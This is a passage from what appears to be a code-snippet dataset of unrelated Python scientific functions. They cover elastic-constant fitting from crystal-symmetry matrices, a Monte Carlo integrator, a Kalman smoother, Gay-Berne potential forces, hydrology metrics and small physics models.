3, 3, 0, 0],\n [ 0, 0, 0, 0, 4, 0],\n [ 0, 0, 0, 0, 5, 0],\n [ 0, 0, 0, 0, 0, 6],\n [ 3,-5,-1, 0, 0, 0],\n [-5, 3,-1, 0, 0, 0],\n [ 0, 0,-2,-1, 0, 0],\n [ 0, 0, 0, 0, 6, 0],\n [ 0, 0, 0, 0, 2, 0],\n [ 0, 0, 0, 0, 0,-4]])\n \n if (LC == 'TII'):\n Matrix = np.mat([[ 1, 2, 3, 6, 0, 0, 0],\n [ 2, 1, 3,-6, 0, 0, 0],\n [ 0, 0, 3, 0, 3, 0, 0],\n [ 0, 0, 0, 0, 0, 4, 0],\n [ 0, 0, 0, 0, 0, 5, 0],\n [ 0, 0, 0,-1, 0, 0, 6],\n [ 3,-5,-1,-4, 0, 0, 0],\n [-5, 3,-1, 4, 0, 0, 0],\n [ 0, 0,-2, 0,-1, 0, 0],\n [ 0, 0, 0, 0, 0, 6, 0],\n [ 0, 0, 0, 0, 0, 2, 0],\n [ 0, 0, 0, 8, 0, 0,-4]])\n \n if (LC == 'O'):\n Matrix = np.mat([[1, 2, 3, 0, 0, 0, 0, 0, 0],\n [0, 1, 0, 2, 3, 0, 0, 0, 0],\n [0, 0, 1, 0, 2, 3, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 4, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 5, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 6],\n [3,-5,-1, 0, 0, 0, 0, 0, 0],\n [0, 3, 0,-5,-1, 0, 0, 0, 0],\n [0, 0, 3, 0,-5,-1, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 6, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 2, 0],\n [0, 0, 0, 0, 0, 0, 0, 0,-4],\n [5, 4, 6, 0, 0, 0, 0, 0, 0],\n [0, 5, 0, 4, 6, 0, 0, 0, 0],\n [0, 0, 5, 0, 4, 6, 0, 0, 0],\n [0, 0, 0, 0, 0, 0,-2, 0, 0],\n [0, 0, 0, 0, 0, 0, 0,-1, 0],\n [0, 0, 0, 0, 0, 0, 0, 0,-3]])\n \n if (LC == 'M'):\n Matrix = np.mat([[ 1, 2, 3, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 1, 0, 0, 2, 3, 6, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 1, 0, 0, 2, 0, 3, 6, 0, 0, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 5, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 5, 0],\n [ 0, 0, 0, 1, 0, 0, 2, 0, 3, 0, 0, 0, 6],\n [-2, 1, 4,-5, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0,-2, 0, 0, 1, 4,-5, 0, 0, 0, 0, 0, 0],\n [ 0, 0,-2, 0, 0, 1, 0, 4,-5, 0, 0, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 6, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 6, 0],\n [ 0, 0, 0,-2, 0, 0, 1, 0, 4, 0, 0,-5, 0],\n [ 3,-5,-1,-4, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 3, 0, 0,-5,-1,-4, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 3, 0, 0,-5, 0,-1,-4, 0, 0, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 2, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 2, 0],\n [ 0, 0, 0, 3, 0, 0,-5, 0,-1, 0, 0,-4, 0],\n [-4,-6, 5, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0,-4, 0, 0,-6, 5, 2, 0, 0, 0, 0, 0, 0],\n [ 0, 0,-4, 0, 0,-6, 0, 5, 2, 0, 0, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 1,-3, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1,-3, 0],\n [ 0, 0, 0,-4, 0, 0,-6, 0, 5, 0, 0, 2, 0],\n [ 5, 4, 6,-3, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 5, 0, 0, 4, 6,-3, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 5, 0, 0, 4, 0, 6,-3, 0, 0, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0,-2,-1, 0, 
0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2,-1, 0],\n [ 0, 0, 0, 5, 0, 0, 4, 0, 6, 0, 0,-3, 0]])\n \n if (LC == 'N'):\n Matrix = np.mat([[ 1, 2, 3, 4, 5, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 1, 0, 0, 0, 0, 2, 3, 4, 5, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 1, 0, 0, 0, 0, 2, 0, 0, 0, 3, 4, 5, 6, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 0, 1, 0, 0, 0, 0, 2, 0, 0, 0, 3, 0, 0, 4, 5, 6, 0, 0, 0],\n [ 0, 0, 0, 0, 1, 0, 0, 0, 0, 2, 0, 0, 0, 3, 0, 0, 4, 0, 5, 6, 0],\n [ 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 2, 0, 0, 0, 3, 0, 0, 4, 0, 5, 6],\n [-2, 1, 4,-3, 6,-5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0,-2, 0, 0, 0, 0, 1, 4,-3, 6,-5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 0,-2, 0, 0, 0, 0, 1, 0, 0, 0, 4,-3, 6,-5, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 0,-2, 0, 0, 0, 0, 1, 0, 0, 0, 4, 0, 0,-3, 6,-5, 0, 0, 0],\n [ 0, 0, 0, 0,-2, 0, 0, 0, 0, 1, 0, 0, 0, 4, 0, 0,-3, 0, 6,-5, 0],\n [ 0, 0, 0, 0, 0,-2, 0, 0, 0, 0, 1, 0, 0, 0, 4, 0, 0,-3, 0, 6,-5],\n [ 3,-5,-1, 6, 2,-4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 3, 0, 0, 0, 0,-5,-1, 6, 2,-4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 3, 0, 0, 0, 0,-5, 0, 0, 0,-1, 6, 2,-4, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 0, 3, 0, 0, 0, 0,-5, 0, 0, 0,-1, 0, 0, 6, 2,-4, 0, 0, 0],\n [ 0, 0, 0, 0, 3, 0, 0, 0, 0,-5, 0, 0, 0,-1, 0, 0, 6, 0, 2,-4, 0],\n [ 0, 0, 0, 0, 0, 3, 0, 0, 0, 0,-5, 0, 0, 0,-1, 0, 0, 6, 0, 2,-4],\n [-4,-6, 5, 1,-3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0,-4, 0, 0, 0, 0,-6, 5, 1,-3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 0,-4, 0, 0, 0, 0,-6, 0, 0, 0, 5, 1,-3, 2, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 0,-4, 0, 0, 0, 0,-6, 0, 0, 0, 5, 0, 0, 1,-3, 2, 0, 0, 0],\n [ 0, 0, 0, 0,-4, 0, 0, 0, 0,-6, 0, 0, 0, 5, 0, 0, 1, 0,-3, 2, 0],\n [ 0, 0, 0, 0, 0,-4, 0, 0, 0, 0,-6, 0, 0, 0, 5, 0, 0, 1, 0,-3, 2],\n [ 5, 4, 6,-2,-1,-3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 5, 0, 0, 0, 0, 4, 6,-2,-1,-3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 5, 0, 0, 0, 0, 4, 0, 0, 0, 6,-2,-1,-3, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 0, 5, 0, 0, 0, 0, 4, 0, 0, 0, 6, 0, 0,-2,-1,-3, 0, 0, 0],\n [ 0, 0, 0, 0, 5, 0, 0, 0, 0, 4, 0, 0, 0, 6, 0, 0,-2, 0,-1,-3, 0],\n [ 0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 4, 0, 0, 0, 6, 0, 0,-2, 0,-1,-3],\n [-6, 3,-2, 5,-4, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0,-6, 0, 0, 0, 0, 3,-2, 5,-4, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 0,-6, 0, 0, 0, 0, 3, 0, 0, 0,-2, 5,-4, 1, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 0,-6, 0, 0, 0, 0, 3, 0, 0, 0,-2, 0, 0, 5,-4, 1, 0, 0, 0],\n [ 0, 0, 0, 0,-6, 0, 0, 0, 0, 3, 0, 0, 0,-2, 0, 0, 5, 0,-4, 1, 0],\n [ 0, 0, 0, 0, 0,-6, 0, 0, 0, 0, 3, 0, 0, 0,-2, 0, 0, 5, 0,-4, 1]])\n \n sigma = np.array(self.__sigma[etacalc])\n \n ci = np.linalg.lstsq(Matrix,sigma)\n \n #-- Cubic structures ------------------------------------------------------------------------------\n if (LC == 'CI' or \\\n LC == 'CII'):\n \n C[0,0]=ci[0][0]\n C[0,1]=ci[0][1]\n C[3,3]=ci[0][2]\n C[1,1]=C[0,0]\n C[2,2]=C[0,0]\n C[0,2]=C[0,1]\n C[1,2]=C[0,1]\n C[4,4]=C[3,3]\n C[5,5]=C[3,3]\n \n #-- Hexagonal Structures --------------------------------------------------------------------------\n if (LC == 'HI' or \\\n LC == 'HII'):\n C[0,0]=ci[0][0]\n C[0,1]=ci[0][1]\n C[0,2]=ci[0][2]\n C[2,2]=ci[0][3]\n C[3,3]=ci[0][4]\n C[1,1]=C[0,0]\n C[1,2]=C[0,2]\n C[4,4]=C[3,3]\n C[5,5]=0.5*(C[0,0]-C[0,1])\n \n #-- Rhombohedral I Structures ---------------------------------------------------------------------\n if (LC == 'RI'):\n C[0,0]= ci[0][0]\n C[0,1]= ci[0][1]\n C[0,2]= ci[0][2]\n C[0,3]= ci[0][3]\n C[2,2]= ci[0][4]\n C[3,3]= ci[0][5]\n C[1,1]= C[0,0]\n C[1,2]= C[0,2]\n 
C[1,3]=-C[0,3]\n C[4,5]= C[0,3]\n C[4,4]= C[3,3]\n C[5,5]=0.5*(C[0,0]-C[0,1])\n \n #-- Rhombohedral II Structures --------------------------------------------------------------------\n if (LC == 'RII'):\n C[0,0]= ci[0][0]\n C[0,1]= ci[0][1]\n C[0,2]= ci[0][2]\n C[0,3]= ci[0][3]\n C[0,4]= ci[0][4]\n C[2,2]= ci[0][5]\n C[3,3]= ci[0][6]\n C[1,1]= C[0,0]\n C[1,2]= C[0,2]\n C[1,3]=-C[0,3]\n C[4,5]= C[0,3]\n C[1,4]=-C[0,4]\n C[3,5]=-C[0,4]\n C[4,4]= C[3,3]\n C[5,5]=0.5*(C[0,0]-C[0,1])\n \n #-- Tetragonal I Structures -----------------------------------------------------------------------\n if (LC == 'TI'):\n C[0,0]= ci[0][0]\n C[0,1]= ci[0][1]\n C[0,2]= ci[0][2]\n C[2,2]= ci[0][3]\n C[3,3]= ci[0][4]\n C[5,5]= ci[0][5]\n C[1,1]= C[0,0]\n C[1,2]= C[0,2]\n C[4,4]= C[3,3]\n \n #-- Tetragonal II Structures ----------------------------------------------------------------------\n if (LC == 'TII'):\n C[0,0]= ci[0][0]\n C[0,1]= ci[0][1]\n C[0,2]= ci[0][2]\n C[0,5]= ci[0][3]\n C[2,2]= ci[0][4]\n C[3,3]= ci[0][5]\n C[5,5]= ci[0][6]\n C[1,1]= C[0,0]\n C[1,2]= C[0,2]\n C[1,5]=-C[0,5]\n C[4,4]= C[3,3]\n \n #-- Orthorhombic Structures -----------------------------------------------------------------------\n if (LC == 'O'):\n C[0,0]=ci[0][0]\n C[0,1]=ci[0][1]\n C[0,2]=ci[0][2]\n C[1,1]=ci[0][3]\n C[1,2]=ci[0][4]\n C[2,2]=ci[0][5]\n C[3,3]=ci[0][6]\n C[4,4]=ci[0][7]\n C[5,5]=ci[0][8]\n \n #-- Monoclinic Structures -------------------------------------------------------------------------\n if (LC == 'M'):\n C[0,0]=ci[0][0]\n C[0,1]=ci[0][1]\n C[0,2]=ci[0][2]\n C[0,5]=ci[0][3]\n C[1,1]=ci[0][4]\n C[1,2]=ci[0][5]\n C[1,5]=ci[0][6]\n C[2,2]=ci[0][7]\n C[2,5]=ci[0][8]\n C[3,3]=ci[0][9]\n C[3,4]=ci[0][10]\n C[4,4]=ci[0][11]\n C[5,5]=ci[0][12]\n \n #-- Triclinic Structures --------------------------------------------------------------------------\n if (LC == 'N'):\n C[0,0]=ci[0][0]\n C[0,1]=ci[0][1]\n C[0,2]=ci[0][2]\n C[0,3]=ci[0][3]\n C[0,4]=ci[0][4]\n C[0,5]=ci[0][5]\n C[1,1]=ci[0][6]\n C[1,2]=ci[0][7]\n C[1,3]=ci[0][8]\n C[1,4]=ci[0][9]\n C[1,5]=ci[0][10]\n C[2,2]=ci[0][11]\n C[2,3]=ci[0][12]\n C[2,4]=ci[0][13]\n C[2,5]=ci[0][14]\n C[3,3]=ci[0][15]\n C[3,4]=ci[0][16]\n C[3,5]=ci[0][17]\n C[4,4]=ci[0][18]\n C[4,5]=ci[0][19]\n C[5,5]=ci[0][20]\n #--------------------------------------------------------------------------------------------------\n \n \n \n for i in range(5):\n for j in range(i+1,6):\n C[j,i] = C[i,j] \n #%%%--- Calculating the elastic moduli ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if self.__cod == 'espresso': C = -C/10.\n elif self.__cod in ['vasp','emto','exciting','wien']: C=C*self.__vToGPa/self.__V0#C = C/4.#C=C*self.__CONV/self.__V0#C = C/4.\n self.BV = (C[0,0]+C[1,1]+C[2,2]+2*(C[0,1]+C[0,2]+C[1,2]))/9\n self.GV = ((C[0,0]+C[1,1]+C[2,2])-(C[0,1]+C[0,2]+C[1,2])+3*(C[3,3]+C[4,4]+C[5,5]))/15\n self.EV = (9*self.BV*self.GV)/(3*self.BV+self.GV)\n self.nuV= (1.5*self.BV-self.GV)/(3*self.BV+self.GV)\n self.S = np.linalg.inv(C)\n self.BR = 1/(self.S[0,0]+self.S[1,1]+self.S[2,2]+2*(self.S[0,1]+self.S[0,2]+self.S[1,2]))\n self.GR =15/(4*(self.S[0,0]+self.S[1,1]+self.S[2,2])-4*(self.S[0,1]+self.S[0,2]+self.S[1,2])+3*(self.S[3,3]+self.S[4,4]+self.S[5,5]))\n self.ER = (9*self.BR*self.GR)/(3*self.BR+self.GR)\n self.nuR= (1.5*self.BR-self.GR)/(3*self.BR+self.GR)\n self.BH = 0.50*(self.BV+self.BR)\n self.GH = 0.50*(self.GV+self.GR)\n self.EH = (9.*self.BH*self.GH)/(3.*self.BH+self.GH)\n self.nuH= (1.5*self.BH-self.GH)/(3.*self.BH+self.GH)\n self.AVR= 
100.*(self.GV-self.GR)/(self.GV+self.GR)\n #--------------------------------------------------------------------------------------------------------------------------------\n Cs.append(C)\n self.__C = Cs", "def __init__(self, temperature=298.0 * simtk.unit.kelvin, sigma=0.1 * simtk.unit.angstroms, timestep=1 * simtk.unit.femtoseconds):\n\n # Create a new Custom integrator.\n super(MetropolisMonteCarloIntegrator, self).__init__(timestep)\n\n # Compute the thermal energy.\n kT = kB * temperature\n\n #\n # Integrator initialization.\n #\n self.addGlobalVariable(\"naccept\", 0) # number accepted\n self.addGlobalVariable(\"ntrials\", 0) # number of Metropolization trials\n\n self.addGlobalVariable(\"kT\", kT) # thermal energy\n self.addPerDofVariable(\"sigma_x\", sigma) # perturbation size\n self.addPerDofVariable(\"sigma_v\", 0) # velocity distribution stddev for Maxwell-Boltzmann (set later)\n self.addPerDofVariable(\"xold\", 0) # old positions\n self.addGlobalVariable(\"Eold\", 0) # old energy\n self.addGlobalVariable(\"Enew\", 0) # new energy\n self.addGlobalVariable(\"accept\", 0) # accept or reject\n\n #\n # Context state update.\n #\n self.addUpdateContextState()\n\n #\n # Update velocities from Maxwell-Boltzmann distribution.\n #\n self.addComputePerDof(\"sigma_v\", \"sqrt(kT/m)\")\n self.addComputePerDof(\"v\", \"sigma_v*gaussian\")\n self.addConstrainVelocities()\n\n #\n # propagation steps\n #\n # Store old positions and energy.\n self.addComputePerDof(\"xold\", \"x\")\n self.addComputeGlobal(\"Eold\", \"energy\")\n # Gaussian particle displacements.\n self.addComputePerDof(\"x\", \"x + sigma_x*gaussian\")\n # Accept or reject with Metropolis criteria.\n self.addComputeGlobal(\"accept\", \"step(exp(-(energy-Eold)/kT) - uniform)\")\n self.addComputePerDof(\"x\", \"(1-accept)*xold + x*accept\")\n # Accumulate acceptance statistics.\n self.addComputeGlobal(\"naccept\", \"naccept + accept\")\n self.addComputeGlobal(\"ntrials\", \"ntrials + 1\")", "def ComputeEnergyConsumption(self):\r\n pass", "def kge_non_parametric(sim, obs, dim=\"time\"):\n cc = spearman_rank_correlation(sim, obs, dim=dim)\n cc.name = \"kge_np_spearman_rank_correlation_coef\"\n kwargs = dict(\n input_core_dims=[[dim], [dim]], dask=\"parallelized\", output_dtypes=[float]\n )\n alpha = xr.apply_ufunc(_fdc_alpha, sim, obs, **kwargs)\n alpha.name = \"kge_np_rel_var\"\n beta = sim.sum(dim=dim) / obs.sum(dim=dim)\n beta.name = \"kge_np_bias\"\n kge = 1 - np.sqrt((cc - 1) ** 2 + (alpha - 1) ** 2 + (beta - 1) ** 2)\n kge.name = \"kge_np\"\n ds_out = xr.merge([kge, cc, alpha, beta])\n return ds_out", "def energy(self):\n return self.mc.energy(self.chain)", "def E_Kalman(self):\n print(\"E step\", file=self.logfile)\n # Computes the estimated mu and R using an RTS smoother after a Kalman filtering\n\n self.P = self.P+1\n\n self.R[:] = 0\n self.mu[:] = 0\n\n F = np.eye(self.P, k=-1)\n F[0,:-1] = self.alpha_g\n Q = np.eye(self.P, 1)\n C = Q.transpose()\n\n # 1 : Forward pass\n mu_prio = np.zeros((self.P, self.L_h))\n R_prio = np.zeros((self.P, self.P, self.L_h))\n mu_post = np.zeros((self.P, self.L_h))\n R_post = np.zeros((self.P, self.P, self.L_h))\n\n # Init on u = 0\n R_prio[0,0,0] = R_prio[0,0,0]+self.la/self.e2[0]\n\n # Update\n residual = self.h[0] - mu_prio[0,0]\n residual_cov = R_prio[0,0,0] + self.sigma2\n K = R_prio[:,0,0]/residual_cov\n\n mu_post[:,0] = mu_prio[:, 0] + K*residual\n\n K_mat = np.eye(self.P)\n K_mat[:,0] = K_mat[:,0] - K\n R_post[:,:,0] = np.dot(K_mat,R_prio[:,:,0])\n\n rescovvec = np.zeros(self.L_h)\n\n 
for u in range(1,self.L_h):\n # Predict\n mu_prio[1:,u] = mu_post[:-1,u-1]\n mu_prio[0,u] = np.dot(self.alpha_g,mu_post[:-1,u-1])\n\n\n\n R_prio[1:,:,u] = R_post[:-1,:,u-1]\n R_prio[0,:,u] = np.dot(self.alpha_g, R_post[:-1,:,u-1])\n R_prio[:,1:,u] = R_prio[:,:-1,u]\n R_prio[:,0,u] = np.dot(self.alpha_g, R_prio[:,1:,u].transpose())\n\n R_prio[0,0,u] = R_prio[0,0,u]+self.la/self.e2[u]\n\n # Update\n residual = self.h[u] - mu_prio[0,u]#np.dot(C, mu_prio[:,u])\n residual_cov = R_prio[0,0,u] + self.sigma2\n rescovvec[u] = residual_cov\n\n K = R_prio[:,0,u]/residual_cov\n mu_post[:,u] = mu_prio[:, u] + K*residual\n\n\n R_post[:,:,u] = R_prio[:,:,u] - np.dot(K[:,np.newaxis], R_prio[0:1,:,u])\n\n\n\n # 2 : Backward pass\n mu_smooth = np.zeros((self.P, self.L_h))\n mu_smooth[:, -1] = mu_post[:, -1]\n self.mu[-1] = mu_smooth[0, -1]\n\n R_smooth = np.zeros((self.P, self.P, self.L_h))\n R_smooth[:,:,-1] = R_post[:,:,-1]\n self.R[-self.P:,-1] = np.flip(R_smooth[:,0, -1])\n self.R[-1,-self.P:] = np.flip(R_smooth[0,:, -1])\n\n\n for u in range(self.L_h-1, self.P-1, -1):\n J = R_post[:,:-1,u-1]\n J = np.concatenate([np.dot(self.alpha_g, J.transpose())[:,np.newaxis],J], axis=1)\n J = np.dot(J, np.linalg.inv(R_prio[:,:,u]))\n\n mu_smooth[:,u-1] = mu_post[:,u-1] + np.dot(J,mu_smooth[:,u] - mu_prio[:,u])\n self.mu[u-1] = mu_smooth[0, u-1]\n\n R_smooth[:,:,u-1] = R_post[:,:,u-1] + np.dot(np.dot(J,R_smooth[:,:,u] - R_prio[:,:,u]),J.transpose())\n\n\n if u > self.P:\n self.R[u-self.P:u, u-1] = np.flip(R_smooth[:,0,u-1])\n self.R[u-1,u-self.P:u] = np.flip(R_smooth[0,:,u-1])\n\n if u == self.P:\n self.R[u-self.P:u, u-self.P:u] = np.flip(R_smooth[:,:,u-1])\n\n\n\n self.mu[:self.P] = np.flip(mu_smooth[:,self.P-1])\n\n self.P = self.P-1\n\n # Propagate\n self._propagate_mu()\n self._propagate_R()", "def force ( r, e ):\n from math import isclose\n\n # Parameters of the Gay-Berne potential \n # \n # The key parameters are \n # mu, nu ................ the exponents \n # kappa and kappa' ....... the anisotropies \n # kappa is the ratio of intermolecular separations \n # sigma_e / sigma_s i.e. end-to-end / side-by-side \n # kappa' is the ratio of well depths \n # epsilon_s / epsilon_e i.e. side-by-side / end-to-end \n # The derived parameters are chi and chi' \n # chi = (kappa**2 - 1) / (kappa**2+1) \n # chi' = (z - 1) / (z + 1)\n # where z = (kappa') ** ( 1 / mu ) \n # \n # For convenience kappa' is spelt xappa, chi' is spelt xhi\n # We choose units such that sigma_s = 1.0 and epsilon_0 = 1.0\n # Two of the following three varieties should be commented out\n\n # Original Gay-Berne-deMiguel potential [J. Chem. Phys, 74, 3316; Mol. Phys. 74, 405 (1991)]\n mu, nu, kappa, xappa = 2, 1, 3.0, 5.0\n\n # # Luckhurst-Phippen potential [Liq. Cryst., 8, 451 (1990)]\n # mu, nu, kappa, xappa = 1, 2, 3.0, 5.0\n\n # # Berardi-Zannoni potential [J. Chem. Soc. 
Faraday Trans., 89, 4069 (1993)]\n # mu, nu, kappa, xappa = 1, 3, 3.0, 5.0\n\n # Derived parameters\n chi = (kappa**2 - 1.0) / (kappa**2+1.0)\n xhi = (xappa**(1.0/mu) - 1.0) / (xappa**(1.0/mu) + 1.0)\n\n # Cutoff distance; normally we would use a larger value\n r_cut = 4.0\n \n assert r.shape == (n,3), 'Incorrect shape of r'\n assert e.shape == (n,3), 'Incorrect shape of e'\n\n # Notation to match appendix\n i = 0\n j = 1\n\n ei = e[i,:]\n ej = e[j,:]\n assert isclose(np.sum(ei**2),1.0), 'Non-unit vector {} {} {}'.format(*ei)\n assert isclose(np.sum(ej**2),1.0), 'Non-unit vector {} {} {}'.format(*ej)\n\n rij = r[i,:] - r[j,:]\n rij_mag = np.sqrt( np.sum(rij**2) ) # Magnitude of separation vector\n sij = rij / rij_mag # Unit vector\n ci = np.dot( ei, sij )\n cj = np.dot( ej, sij )\n cij = np.dot( ei, ej )\n cp = ci + cj\n cm = ci - cj\n\n # Sigma formula\n cpchi = cp/(1.0+chi*cij)\n cmchi = cm/(1.0-chi*cij)\n sigma = 1.0/np.sqrt(1.0-0.5*chi*(cp*cpchi+cm*cmchi))\n\n # Epsilon formula\n eps1 = 1.0/np.sqrt(1.0-(chi*cij)**2) # Depends on chi, not xhi\n cpxhi = cp/(1.0+xhi*cij)\n cmxhi = cm/(1.0-xhi*cij)\n eps2 = 1.0-0.5*xhi*(cp*cpxhi+cm*cmxhi) # Depends on xhi\n epsilon = (eps1**nu) * (eps2**mu)\n\n # Potential at rij\n rho = rij_mag - sigma + 1.0\n rho6 = 1.0 / rho**6\n rho12 = rho6**2\n rhoterm = 4.0*(rho12 - rho6) # Needed for forces and torques\n drhoterm = -24.0 * (2.0 * rho12 - rho6) / rho # Needed for forces and torques\n pot = epsilon*rhoterm\n\n # Potential at r_cut\n rho = r_cut - sigma + 1.0\n rho6 = 1.0 / rho**6\n rho12 = rho6**2\n cutterm = 4.0*(rho12 - rho6) # Needed for cutoff forces and torques\n dcutterm = -24.0 * (2.0 * rho12 - rho6) / rho # Needed for cutoff forces and torques\n pot = pot - epsilon * cutterm\n\n # Derivatives of sigma\n prefac = 0.5*chi*sigma**3\n dsig_dci = prefac*(cpchi+cmchi)\n dsig_dcj = prefac*(cpchi-cmchi)\n prefac = prefac*(0.5*chi)\n dsig_dcij = -prefac*(cpchi**2-cmchi**2)\n\n # Derivatives of epsilon\n prefac = -mu*xhi*(eps1**nu)*eps2**(mu-1)\n deps_dci = prefac*(cpxhi+cmxhi)\n deps_dcj = prefac*(cpxhi-cmxhi)\n prefac = prefac*(0.5*xhi)\n deps_dcij = -prefac*(cpxhi**2-cmxhi**2) # From derivative of eps2\n deps_dcij = deps_dcij + nu*(chi**2)*(eps1**(nu+2))*(eps2**mu)*cij # From derivative of eps1\n\n # Derivatives of potential\n dpot_drij = epsilon * drhoterm\n dpot_dci = rhoterm * deps_dci - epsilon * drhoterm * dsig_dci\n dpot_dcj = rhoterm * deps_dcj - epsilon * drhoterm * dsig_dcj\n dpot_dcij = rhoterm * deps_dcij - epsilon * drhoterm * dsig_dcij\n\n # Standard formula for forces and torque gradients\n fij = -dpot_drij*sij - dpot_dci*(ei-ci*sij)/rij_mag - dpot_dcj*(ej-cj*sij)/rij_mag\n gi = dpot_dci*sij + dpot_dcij*ej\n gj = dpot_dcj*sij + dpot_dcij*ei\n\n # Derivatives of potential at cutoff\n dpot_drij = epsilon * dcutterm\n dpot_dci = cutterm * deps_dci - epsilon * dcutterm * dsig_dci\n dpot_dcj = cutterm * deps_dcj - epsilon * dcutterm * dsig_dcj\n dpot_dcij = cutterm * deps_dcij - epsilon * dcutterm * dsig_dcij\n\n # Standard formula for forces and torque gradients (without dpot_drij term)\n fij = fij + dpot_dci*(ei-ci*sij)/rij_mag + dpot_dcj*(ej-cj*sij)/rij_mag\n gi = gi - ( dpot_dci*sij + dpot_dcij*ej ) \n gj = gj - ( dpot_dcj*sij + dpot_dcij*ei ) \n\n # Final forces and torques\n f = np.empty_like(r)\n t = np.empty_like(r)\n f[i,:] = fij\n f[j,:] = -fij\n t[i,:] = -np.cross(ei,gi)\n t[j,:] = -np.cross(ej,gj)\n\n return pot, f, t", "def calc_gravitational_energy(self):\n\n star = self.star\n\n K, N = star.mesh_size\n mu = star.mu_coords\n r 
= star.r_coords\n\n def S1(j):\n return np.sum((mu[2::2] - mu[:-2:2]) * (star.rho[:-2:2, j] * star.Phi[:-2:2, j] +\n 4 * star.rho[1:-1:2, j] * star.Phi[1:-1:2, j] +\n star.rho[2::2, j] * star.Phi[2::2, j])) / 6\n\n W = 0\n\n for j in range(0, N - 2, 2):\n W += (r[j + 2] - r[j]) * (r[j]**2 * S1(j) +\n 4 * r[j + 1]**2 * S1(j + 1) +\n r[j + 2]**2 * S1(j + 2))\n\n return -1 / 3 * np.pi * W", "def DynamicsCo(x, t, T0, alpha, cost_co, cost_ch, K_co, K_ch, n, r):\n y=np.zeros([np.size(x)])\n D=np.zeros([2]) \n #define fitnss\n D[0]=dmax*x[0]**n/(K_co**n+x[0]**n) #cooperator\n D[1]=dmax*x[0]**n/(K_ch**n+x[0]**n) #cheater \n #degradation\n deg=fmax*x[1]/(x[1]+Kd) \n #ODE of eco-evo dynamics\n y[0]=alpha*T0-deg*x[0]-alpha*x[0] #dt/dt\n y[1]=x[1]*(r*(1-cost_co)*(1-x[1]-x[2])-D[0]-alpha)#d Co/dt\n y[2]=x[2]*(r*(1-cost_ch)*(1-x[1]-x[2])-D[1]-alpha) #d Ch/dt\n \n return y", "def energy(n):\n return (n * pi * hbar / (2 * a)) ** 2 / (2 * m)", "def temperature_energy():\n e = _si.e.value\n k_B = _si.k_B.value\n return Equivalency(\n [(si.K, si.eV, lambda x: x / (e / k_B), lambda x: x * (e / k_B))],\n \"temperature_energy\",\n )", "def overheadmodel(J=None, m=None, mt=None, r=None, gravity=9.81,\n counterg=False):\n\n mmat = np.diag([mt, J, m, m])\n\n # state: x = [s, beta, xd, zd].T\n\n amat = np.zeros((4, 4))\n bmat = np.array([[1., 0], [0, 1.], [0, 0], [0, 0]])\n cmat = np.array([[0, 0, 1, 0], [0, 0, 0, 1]])\n\n if counterg:\n rhs = np.array([[0, -m*gravity*r, 0, m*gravity]]).T\n else:\n rhs = np.array([[0, 0, 0, m*gravity]]).T\n\n def holoc(x=None):\n return (x[2] - x[0])**2 + x[3]**2 - (r*x[1])**2\n\n def holojaco(x):\n return 2*np.array([[-(x[2]-x[0]), -r**2*x[1], x[2]-x[0], x[3]]]).\\\n reshape((1, x.size))\n\n def holohess(x):\n return 2*np.array([[1, 0, -1, 0],\n [0, -r**2, 0, 0],\n [-1, 0, 1, 0],\n [0, 0, 0, 1]])\n\n ovhdcrn = dict(mmat=mmat, amat=amat, bmat=bmat, cmat=cmat,\n rhs=rhs, holoc=holoc, holojaco=holojaco, 